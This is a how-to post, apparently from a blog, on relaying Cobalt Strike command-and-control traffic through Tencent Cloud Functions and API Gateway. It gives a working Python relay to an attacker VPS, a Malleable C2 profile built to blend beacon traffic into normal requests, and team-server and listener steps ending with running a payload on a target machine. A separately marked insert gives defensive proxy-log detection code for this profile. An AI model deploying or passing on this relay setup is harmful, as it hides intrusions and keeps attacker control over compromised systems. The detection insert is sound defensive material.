Deploying Cobalt Strike C2 Infrastructure via Tencent Cloud Functions

Prerequisites

  • Active Tencent Cloud account (API Gateway offers a free tier for the first year)
  • A VPS with Cobalt Strike installed (version 4.2 used in this example)

Cloud Function Setup

  1. Access the Tencent Cloud console and navigate to the Cloud Functions service. Complete the initial authorization if prompted.
  2. Create a new function. Choose "Start from scratch", assign a name, and select Python 3.6 as the runtime environment.
  3. Scroll down to the code editor and insert the following script. Replace the c2_url variable with your VPS IP or domain.
import requests
import base64
import json

def main_handler(event, context):
    # Configure your C2 server address here (HTTP or HTTPS)
    c2_url = 'https://<YOUR_VPS_IP>' 
    
    request_path = event.get('path', '/')
    request_headers = event.get('headers', {})
    http_method = event.get('httpMethod')

    if http_method == 'GET':
        backend_resp = requests.get(f"{c2_url}{request_path}", headers=request_headers, verify=False)
    else:
        payload = event.get('body', '')
        backend_resp = requests.post(f"{c2_url}{request_path}", data=payload, headers=request_headers, verify=False)

    # Encode the response body to Base64 for the API Gateway
    encoded_body = base64.b64encode(backend_resp.content).decode('utf-8')

    return {
        "isBase64Encoded": True,
        "statusCode": backend_resp.status_code,
        "headers": dict(backend_resp.headers),
        "body": encoded_body
    }
  4. Once saved, go to the Trigger Management tab and create a new trigger.
  5. Configure the trigger to use the API Gateway. After creation, click on the API Service name to configure the routing.
  6. Edit the API configuration: set the path to / and complete the setup wizard. Ensure the service is published.

Cobalt Strike Profile Configuration

Create a Malleable C2 profile (e.g., tencent_cloud.profile) with the following configuration to blend traffic:

set sample_name "cache";

set sleeptime "5000";
set jitter "10";

http-get {
    set uri "/cloud/auth";

    client {
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
        metadata {
            base64;
            prepend "SESSION=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/json";
        header "Server" "Nginx";
        output {
            base64;
            print;
        }
    }
}

http-post {
    set uri "/cloud/data";

    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "ID=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/json";
        output {
            base64;
            print;
        }
    }
}

http-stager {
    set uri_x86 "/libs/loader_x86.dll";
    set uri_x64 "/libs/loader_x64.dll";
}
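
Seen from the monitoring side, the fixed URIs, cookie prefixes and sleep interval in this profile can be matched in web proxy logs. The following is an added example, not part of the original post: it flags requests shaped like the profile and clients that repeat the GET check-in at about the configured 5-second sleep. The record field names, the sample data, the host name and the timing window are assumptions.

```python
import base64
import binascii
from collections import defaultdict
from statistics import median

# Indicators from the profile on this page: (method, URI) -> cookie prefix.
PROFILE = {("GET", "/cloud/auth"): "SESSION=", ("POST", "/cloud/data"): "ID="}
STAGER_URIS = {"/libs/loader_x86.dll", "/libs/loader_x64.dll"}
SLEEP_S, JITTER = 5.0, 0.10  # sleeptime "5000" (ms) and jitter "10" (%)

def is_base64(value):
    try:
        base64.b64decode(value, validate=True)
        return len(value) >= 8
    except (binascii.Error, ValueError):
        return False

def matches_profile(rec):
    """True when a single request has the shape this profile gives Beacon traffic."""
    if rec["method"] == "GET" and rec["uri"] in STAGER_URIS:
        return True
    prefix = PROFILE.get((rec["method"], rec["uri"]))
    cookie = rec.get("cookie", "")
    return bool(prefix) and cookie.startswith(prefix) and is_base64(cookie[len(prefix):])

def find_beacons(records, min_hits=4, slack=1.0):
    """Return (client, host) pairs whose matching GETs repeat at the profile's cadence."""
    times = defaultdict(list)
    for rec in records:
        if rec["uri"] == "/cloud/auth" and matches_profile(rec):
            times[(rec["client"], rec["host"])].append(rec["ts"])
    # Assumed window: the sleep shortened by up to JITTER, plus slack for network delay.
    lo, hi = SLEEP_S * (1 - JITTER) - slack, SLEEP_S + slack
    flagged = []
    for key, ts in sorted(times.items()):
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        if len(ts) >= max(min_hits, 2) and lo <= median(gaps) <= hi:
            flagged.append(key)
    return flagged

# Constructed sample records (not real traffic); ts is seconds since capture start.
def sample_rec(ts, client, method, uri, cookie=""):
    return {"ts": ts, "client": client, "host": "gw.example.invalid",
            "method": method, "uri": uri, "cookie": cookie}

SAMPLE = (
    [sample_rec(t, "10.0.0.5", "GET", "/cloud/auth", "SESSION=QUJDREVGR0hJSktM")
     for t in (0.0, 4.8, 9.5, 14.4, 19.1)]
    + [sample_rec(3.0, "10.0.0.9", "GET", "/cloud/auth", "SESSION=not base64!"),
       sample_rec(7.0, "10.0.0.9", "GET", "/index.html")]
)
```

Calling find_beacons(SAMPLE) returns the one client whose check-ins match both the request shape and the interval. A profile with different URIs or cookie names will not match these literals, so the timing check is the part that carries over.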

Launching the Team Server

  1. Terminate any running Java instances associated with Cobalt Strike:
    pkill -f java
    
  2. Start the team server loading the custom profile:
    ./teamserver <VPS_IP> <PASSWORD> tencent_cloud.profile
    

Listener and Execution

  1. In the Cobalt Strike client, create an HTTP Listener.
  2. Set the Host field to the public domain provided by the Tencent Cloud API Gateway trigger.
  3. Set the port to 443 if using HTTPS, or 80 for HTTP, matching the configuration in your Python script.
  4. Generate a payload (Windows EXE) and execute it on the target machine. The beacon will route traffic through the cloud function to your VPS.


Posted on Tue, 02 Jun 2026 16:47:06 +0000 by nEmoGrinder